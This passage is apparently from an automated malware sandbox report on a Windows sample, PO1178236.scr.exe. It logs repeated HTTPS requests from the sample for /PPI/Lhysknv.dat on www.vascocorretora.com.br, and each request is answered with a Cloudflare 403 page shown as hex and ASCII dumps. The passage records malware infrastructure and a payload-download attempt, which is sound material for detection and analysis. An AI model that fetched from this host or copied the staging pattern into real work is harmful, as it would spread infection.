        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:53 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FMESUcIAM0Q%2B5w%2BY%2F02zQBDA3KvxVdts1EPnX8xO082g%2FTxlJxm6w%2BgMm9ZeAswKfY3U3njcEdN6BtLPjb8na8XoIVM%2F7skr%2FnjCwiOkn08rgKA4GL49PvKpbPFqHKu5JcMF%2BxejMTsEXs2I"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1e75aba8cb7-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1967&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1467336&cwnd=168&unsent_bytes=0&cid=d31439cf28976967&ts=133&x=0"
        2025-01-09 07:36:38 UTC354INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:38 UTC1369INData Raw: 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22
        Data Ascii: | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="
        2025-01-09 07:36:38 UTC1369INData Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21
        Data Ascii: -section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div><!
        2025-01-09 07:36:38 UTC1369INData Raw: 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 65 37 35 61 62 61 38 63 62 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
        Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1e75aba8cb7</strong></span> <span class="cf-footer-separator s
        2025-01-09 07:36:38 UTC1008INData Raw: 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 65 37 35 61 62 61 38 63 62 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4f 43 34 77 4d 44 41 77 4d 44
        Data Ascii: pt> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1e75aba8cb7',t:'MTczNjQwODE5OC4wMDAwMD
        2025-01-09 07:36:38 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        68192.168.2.949776188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:38 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:38 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:38 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:53 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izzGUI3WYNVri8Y0yTngcWk3LFQVLwxSUbcwyrMXAf2tZFvb%2BnhViqEQrXzq3e2SiWX4C94NTkUp0HtOfhF1aAucPoHdOiGBrLjEAhKJudKpAzKrd194Ut84JhbzGrSpWo4fOiyEmyiiQvhT"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1eb0b02efa3-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2041&min_rtt=2013&rtt_var=775&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1450571&cwnd=122&unsent_bytes=0&cid=88453ffa7733e33f&ts=137&x=0"
        2025-01-09 07:36:38 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:38 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:36:38 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:36:38 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 65 62 30 62 30 32 65 66 61 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1eb0b02efa3</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:36:38 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 65 62 30 62 30 32 65 66 61 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1eb0b02efa3',t:'MTczNjQwODE5OC4wMDAwMDA='};var a=doc
        2025-01-09 07:36:38 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        69192.168.2.949777188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:39 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:39 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:39 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:54 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=foTmgvRmt%2BlxwIaH4fEYCSZVqkXcMdQNT8Zay%2F1zFHM78tQEeZ4pNHgIkRHGKZEaida%2BeHl%2BGZl6j4nrBk2%2BUMfLoja00omiQxYQFeFPlMhE%2BuUKB%2BwrhCOXEksdO8R6pOSM7TEo7k0mDJj0"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1eecdd772a1-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2018&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1446977&cwnd=194&unsent_bytes=0&cid=d9fe7a255fdee34d&ts=147&x=0"
        2025-01-09 07:36:39 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:39 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:39 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:39 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 65 65 63 64 64 37 37 32 61 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1eecdd772a1</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:39 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 65 65 63 64 64 37 37 32 61 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4f 53 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1eecdd772a1',t:'MTczNjQwODE5OS4wMDAwMDA=
        2025-01-09 07:36:39 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        70192.168.2.949778188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:39 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:40 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:40 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:55 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysfXbX06mIy7k3IUKsizpDfRG2ZZPRaAzjedyj1lYf8f0ihXV2KgAUsnsaLC%2B0u0ozZ3mxrTTHQ1hU%2BvNpSJ2L%2FUjzjnalectqbJssB77XJI3HQaH0my7qXrtcr6nE60jJ%2FEYcB2naWrNFaz"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1f28e0543ff-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1680&rtt_var=655&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1640449&cwnd=216&unsent_bytes=0&cid=073aa9e57cb669fb&ts=152&x=0"
        2025-01-09 07:36:40 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
